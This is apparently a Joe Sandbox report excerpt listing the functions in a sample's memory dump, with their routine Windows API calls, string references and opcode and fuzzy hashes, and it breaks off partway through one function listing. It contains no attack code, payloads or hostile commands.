Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004), ref: 00412092
InitializeCriticalSection.KERNEL32(00418688,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000), ref: 0041209E
TlsGetValue.KERNEL32(?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004), ref: 004120B4
HeapAlloc.KERNEL32(00000008,00000014,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 004120CE
EnterCriticalSection.KERNEL32(00418688,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000), ref: 004120DF
LeaveCriticalSection.KERNEL32(00418688,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 004120FB
GetCurrentProcess.KERNEL32(00000000,00100000,00000000,00000000,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000), ref: 00412114
GetCurrentThread.KERNEL32 ref: 00412117
GetCurrentProcess.KERNEL32(00000000,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 0041211E
DuplicateHandle.KERNEL32(00000000,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00412121
RegisterWaitForSingleObject.KERNEL32(0000000C,00000000,0041217A,00000000,000000FF,00000008), ref: 00412137
TlsSetValue.KERNEL32(00000000,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00412144
HeapAlloc.KERNEL32(00000000,0000000C,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00412155

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: AllocCriticalCurrentSection$HeapProcessValue$DuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
String ID:
API String ID: 298514914-0
Opcode ID: 090f9e8ec264e5d12bc44ccd603b7065f48900f7029304d299a0ea3cd3686378
Instruction ID: d80fd07e77255670f12a4e616af7295cf706cbaed93ad9a0fedfb01b657d880b
Opcode Fuzzy Hash: 090f9e8ec264e5d12bc44ccd603b7065f48900f7029304d299a0ea3cd3686378
Instruction Fuzzy Hash: 35211971644305FFDB119F64ED88B963FBAFB49311F04C43AFA09962A1CBB49850DB68

Function 00403275 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 176COMMON

Download Yara Rule

APIs

GetWindowsDirectoryW.KERNEL32(00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 00403302
PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 0040330B
GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 0040342B
PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000800,00000000,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00403434

Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(00940000,00000000,?,?), ref: 0040DF1C

PathAddBackslashW.SHLWAPI(00000000,00000000,sysnative,00000000,00000000,00000000,00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 0040333B

Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB

Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(00940000,00000000,?), ref: 0040DEF9

GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 00403468
PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 00403471

Strings

sysnative, xrefs: 00403322, 00403327

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: BackslashPath$Directory$AllocateErrorHeapLastSystemValue$Windows
String ID: sysnative
API String ID: 3406704365-821172135
Opcode ID: e5455a9928b97281f132b1c2dd1bbabf065e779dbb70284d860f41b952fb8df8
Instruction ID: 2364f58bb10a159e0aa11294c57d56a9f179ba7a21fd77f55822fae8b4f54734
Opcode Fuzzy Hash: e5455a9928b97281f132b1c2dd1bbabf065e779dbb70284d860f41b952fb8df8
Instruction Fuzzy Hash: F5514075518701AAD600BBB2CC82B2F76A9AFD0709F10CC3FF544790D2CA7CD8599A6E

Function 0040DA43 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 53librarysleeploaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Kernel32.dll,00000000,00000000,00000000,00000004,00000000,0040D855,0041861C,0040D9E2,00000000,FFFFFFED,00000200,76ED5E70,00409E76,FFFFFFED,00000010), ref: 0040DA51
GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0040DA66
FreeLibrary.KERNEL32(00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040DA81
InterlockedCompareExchange.KERNEL32(00000000,00000001,00000000), ref: 0040DA90
Sleep.KERNEL32(00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040DAA2
InterlockedExchange.KERNEL32(00000000,00000002), ref: 0040DAB5

Strings

InitOnceExecuteOnce, xrefs: 0040DA60
Kernel32.dll, xrefs: 0040DA4A

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: ExchangeInterlockedLibrary$AddressCompareFreeLoadProcSleep
String ID: InitOnceExecuteOnce$Kernel32.dll
API String ID: 2918862794-1339284965
Opcode ID: 04ec49063c38c3d68cea197a5330db743d42037b633bf3bb84411c831da1e2b1
Instruction ID: e7d3430369b103de8e34323ddaa6381870798cc52ac97d2691a1b23ef8b22f52
Opcode Fuzzy Hash: 04ec49063c38c3d68cea197a5330db743d42037b633bf3bb84411c831da1e2b1
Instruction Fuzzy Hash: A701B132748204BAD7116FE49C49FEB3B29EF42762F10813AF905A11C0DB7C49458A6D

Function 00409507 Relevance: 12.0, APIs: 8, Instructions: 50threadwindowCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(?,00000000), ref: 00409511
GetCurrentThreadId.KERNEL32 ref: 0040951F
IsWindowVisible.USER32(?), ref: 00409526

Part of subcall function 0040DB72: HeapAlloc.KERNEL32(00000008,00000000,0040D3EC,00418610,00000014,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000), ref: 0040DB7E

GetCurrentThreadId.KERNEL32 ref: 00409543
GetWindowLongW.USER32(?,000000EC), ref: 00409550
GetForegroundWindow.USER32 ref: 0040955E
IsWindowEnabled.USER32(?), ref: 00409569
EnableWindow.USER32(?,00000000), ref: 00409579

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: Window$Thread$Current$AllocEnableEnabledForegroundHeapLongProcessVisible
String ID:
API String ID: 3383493704-0
Opcode ID: 761db0cbe0c8efe4181c57131f09a45cb1cea28f7de62a6f083fb5992236dbff
Instruction ID: 9be2ebae674c1fa36b8fc713cd4e728ef3198b0ad07c7790c0b3041e5f2a4f9d
Opcode Fuzzy Hash: 761db0cbe0c8efe4181c57131f09a45cb1cea28f7de62a6f083fb5992236dbff
Instruction Fuzzy Hash: A901B9315083016FD3215B769C88AABBAB8AF55750B04C03EF456D3191D7749C40C66D

Function 00408EB4 Relevance: 10.6, APIs: 7, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?), ref: 00408EED
GetWindowLongW.USER32(?,000000EB), ref: 00408EFC
GetWindowTextLengthW.USER32 ref: 00408F0A
HeapAlloc.KERNEL32(00000000), ref: 00408F1F
GetWindowTextW.USER32(00000000,00000001), ref: 00408F2F
DestroyWindow.USER32(?), ref: 00408F3D
UnregisterClassW.USER32 ref: 00408F53

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: Window$DestroyText$AllocClassHeapLengthLongUnregister
String ID:
API String ID: 2895088630-0
Opcode ID: cc61bfd3fa705e2cc6efe011ffba927a9334bb0a4f310b6a0f05db5f7333bb42
Instruction ID: dcdd979020c5d84d31bdac08dec077088d7257a56d77306a58cab45369b049af
Opcode Fuzzy Hash: cc61bfd3fa705e2cc6efe011ffba927a9334bb0a4f310b6a0f05db5f7333bb42
Instruction Fuzzy Hash: C611183110810ABFCB116F64ED4C9E63F76EB08361B00C53AF44592AB0CF359955EB58

Function 00409588 Relevance: 9.1, APIs: 6, Instructions: 68threadCOMMON

Download Yara Rule

APIs

EnumWindows.USER32(00409507,?), ref: 0040959B
GetCurrentThreadId.KERNEL32 ref: 004095B3
SetWindowPos.USER32(?,000000FE,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?), ref: 004095CF
GetCurrentThreadId.KERNEL32 ref: 004095EF
EnableWindow.USER32(?,00000001), ref: 00409605
SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?), ref: 0040961C

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: Window$CurrentThread$EnableEnumWindows
String ID:
API String ID: 2527101397-0
Opcode ID: f28d4ca554cd3ae9a733ad6cb4d62ecbd868711740a6e1fed135e0e6fc6d1c23
Instruction ID: f5a6386b144a933a28a8080deaf79be6790ca9cb7a06763c23f847dded1acd22
Opcode Fuzzy Hash: f28d4ca554cd3ae9a733ad6cb4d62ecbd868711740a6e1fed135e0e6fc6d1c23
Instruction Fuzzy Hash: 3E11AF32548741BBD7324B16EC48F577BB9EB81B20F14CA3EF052226E1DB766D44CA18

Function 0040D353 Relevance: 9.1, APIs: 6, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D378
HeapAlloc.KERNEL32(00000008,00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D38C
TlsSetValue.KERNEL32(00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D399
TlsGetValue.KERNEL32(00000010,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D3B0
HeapReAlloc.KERNEL32(00000008,00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D3BF
TlsSetValue.KERNEL32(00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D3CE

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: AllocValue$Heap
String ID:
API String ID: 2472784365-0
Opcode ID: d4aa023bea7065d4958094be2e1b0a1f42a8661c5ef268aa00a39480e26025ae
Instruction ID: 1e11015e4a25d7f5304c1c18fd55a95fd758b035f13ce6db6bcec7fc4f8c26ab
Opcode Fuzzy Hash: d4aa023bea7065d4958094be2e1b0a1f42a8661c5ef268aa00a39480e26025ae
Instruction Fuzzy Hash: 22116372A45310AFD7109FA5EC84A967BA9FB58760B05803EF904D33B2DB359C048AAC

Function 00412004 Relevance: 9.0, APIs: 6, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

UnregisterWait.KERNEL32(?), ref: 0041200E
CloseHandle.KERNEL32(?,?,?,?,0041218A,?), ref: 00412017
EnterCriticalSection.KERNEL32(00418688,?,?,?,0041218A,?), ref: 00412023
LeaveCriticalSection.KERNEL32(00418688,?,?,?,0041218A,?), ref: 00412048
HeapFree.KERNEL32(00000000,00000000,?,?,?,0041218A,?), ref: 00412066
HeapFree.KERNEL32(?,?,?,?,?,0041218A,?), ref: 00412078

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: CriticalFreeHeapSection$CloseEnterHandleLeaveUnregisterWait
String ID:
API String ID: 4204870694-0
Opcode ID: 74c8b0c47b40b3dfa83cc76d0e2e37435eae102b1f5068a19a02dca3843f56c7
Instruction ID: 90751bbfb1e58074f86cd24fa3ef9024ec02ad1f71581e15228f0d3cd8da5416
Opcode Fuzzy Hash: 74c8b0c47b40b3dfa83cc76d0e2e37435eae102b1f5068a19a02dca3843f56c7
Instruction Fuzzy Hash: F5012970201601EFC7249F11EE88A96BF75FF493557108539E61AC2A70C731A821DBA8

Function 004057F0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 118COMMON

Download Yara Rule

APIs

wcsncmp.MSVCRT ref: 00405853
memmove.MSVCRT(00000000,00000000,?,00000000,00000000,?,?,-0000012C,?,?,004022A6,00000000,00000002,00000000,00000000,00417024), ref: 004058E1
wcsncpy.MSVCRT ref: 004058F9

Strings

$0A, xrefs: 00405819
$0A, xrefs: 0040580C

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: memmovewcsncmpwcsncpy
String ID: $0A$$0A
API String ID: 1452150355-167650565
Opcode ID: d76f75147769cfeda3015acce6fec10c4d54059df292c5d7079ca0585360228a
Instruction ID: fc6078814c183f32d07ee1b1bbfb59dc2b99a9263d9aed9d6ca5449e395b5937
Opcode Fuzzy Hash: d76f75147769cfeda3015acce6fec10c4d54059df292c5d7079ca0585360228a
Instruction Fuzzy Hash: 4C31D536904B058BC720FF55888057B77A8EE84344F14893EEC85373C2EB799D61DBAA

Function 00405553 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00405562
GetModuleHandleW.KERNEL32(ntdll.dll,?,?,00000000), ref: 00405571
GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00405581

Strings

RtlGetVersion, xrefs: 0040557B
ntdll.dll, xrefs: 0040556C

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: AddressHandleModuleProcmemset
String ID: RtlGetVersion$ntdll.dll
API String ID: 3137504439-1489217083
Opcode ID: 6332086022332b991d2c4cf9c539ad8fbd8ac088d8322b57d3057784f2e87649
Instruction ID: 30d66d9a54b09ec8b40df40bafdfba1d8cbaec4fc0a5d0b23e6a41b72964e000
Opcode Fuzzy Hash: 6332086022332b991d2c4cf9c539ad8fbd8ac088d8322b57d3057784f2e87649
Instruction Fuzzy Hash: FAE09A3176461176C6202B76AC09FCB2AACDF8AB01B14043AB105E21C5E63C8A018ABD

Function 0040A043 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 0040A0AB
HeapAlloc.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00000000,00409ECC,?,?,00000000,?,?,00403C62), ref: 0040A0C1
wcscpy.MSVCRT ref: 0040A0CC
memset.MSVCRT ref: 0040A0FA

Strings

$0A, xrefs: 0040A07C

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: AllocHeapmemsetwcscpywcslen
String ID: $0A
API String ID: 1807340688-513306843
Opcode ID: ddb17ac4584ae50943752de31405e04708b8483d2d19b8b99954ed05a6fee5b2
Instruction ID: f5e08f91bfd61cb5ee80f18050d08b7446549b79f9f251a776f81db7a0f8ced7
Opcode Fuzzy Hash: ddb17ac4584ae50943752de31405e04708b8483d2d19b8b99954ed05a6fee5b2
Instruction Fuzzy Hash: ED212431100B04AFC321AF259845B2BB7F9EF88314F14453FFA8562692DB39A8158B1A

Function 00409DE0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00409ECF: HeapFree.KERNEL32(00000000,?,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000), ref: 00409EFA
Part of subcall function 00409ECF: HeapFree.KERNEL32(00000000,?,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409F06
Part of subcall function 00409ECF: HeapFree.KERNEL32(00000000,?,?,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 00409F1A
Part of subcall function 00409ECF: HeapFree.KERNEL32(00000000,00000000,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409F30

HeapAlloc.KERNEL32(00000000,0000003C,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409DFF
HeapAlloc.KERNEL32(00000008,00000015,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409E25
HeapAlloc.KERNEL32(00000008,FFFFFFED,FFFFFFED,00000010,00010000,00000004,00000200,?,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 00409E82
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409E9C

Strings

$0A, xrefs: 00409E87

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: Heap$Free$Alloc
String ID: $0A
API String ID: 3901518246-513306843
Opcode ID: b46946705b204f9c30dffdadfffedc2aca485d526b87e64f112108196cd3b2d8
Instruction ID: e0ba865afb0c504cde721ebe6402ca52a8b9bc1920db32d4218675ac1f34fbd8
Opcode Fuzzy Hash: b46946705b204f9c30dffdadfffedc2aca485d526b87e64f112108196cd3b2d8
Instruction Fuzzy Hash: EC213971600616ABD320DF2ADC01B46BBE9BF88710F41852AB548A76A1DB71EC248BD8

Function 00405492 Relevance: 7.6, APIs: 5, Instructions: 60synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00001000,?,?,00000000,00948F58), ref: 004054AB
EnterCriticalSection.KERNEL32(004186A8,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054BD
WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000), ref: 004054D4
CloseHandle.KERNEL32(00000008,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054E0

Part of subcall function 0040DB32: HeapFree.KERNEL32(00000000,-00000008,0040D44B,00000010,00000800,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?), ref: 0040DB6B

LeaveCriticalSection.KERNEL32(004186A8,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 00405523

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: CriticalSection$CloseCreateEnterFreeHandleHeapLeaveObjectSingleThreadWait
String ID:
API String ID: 3708593966-0
Opcode ID: 90d5c19b946ffb749f21a3af15512962dae866b54bf80da6b69c9a1821aaad17
Instruction ID: 0c8983fff82f944e714e95dc609c427016460782395ad7ea9b381996daa8850a
Opcode Fuzzy Hash: 90d5c19b946ffb749f21a3af15512962dae866b54bf80da6b69c9a1821aaad17
Instruction Fuzzy Hash: 6E110632145604BFC3015F54EC05ED7BBB9EF45752721846BF800972A0EB75A8508F6D

Function 0040D946 Relevance: 7.6, APIs: 5, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00418624,00000200,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3), ref: 0040D95A
LeaveCriticalSection.KERNEL32(00418624,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040D9AF

Part of subcall function 0040D946: HeapFree.KERNEL32(00000000,?,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004), ref: 0040D9A8

DeleteCriticalSection.KERNEL32(00000020,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3), ref: 0040D9C8
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200), ref: 0040D9D7

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: CriticalSection$FreeHeap$DeleteEnterLeave
String ID:
API String ID: 3171405041-0
Opcode ID: cbed9a95af3197c0c236be5f183e3b734408b447f4af695c0c167132bfd4a986
Instruction ID: 8e0b58a532cd0764c064264ab0afec864f9344a56e81b99afb7742a3bcd9c4dc
Opcode Fuzzy Hash: cbed9a95af3197c0c236be5f183e3b734408b447f4af695c0c167132bfd4a986
Instruction Fuzzy Hash: 80112B71501601AFC7209F55DC48B96BBB5FF49311F10843EA45A936A1D738A844CF98

Function 00409698 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 0040E260: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E26C
Part of subcall function 0040E260: HeapReAlloc.KERNEL32(00940000,00000000,?,?), ref: 0040E2C7

GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 004096B4
wcscmp.MSVCRT ref: 004096C2
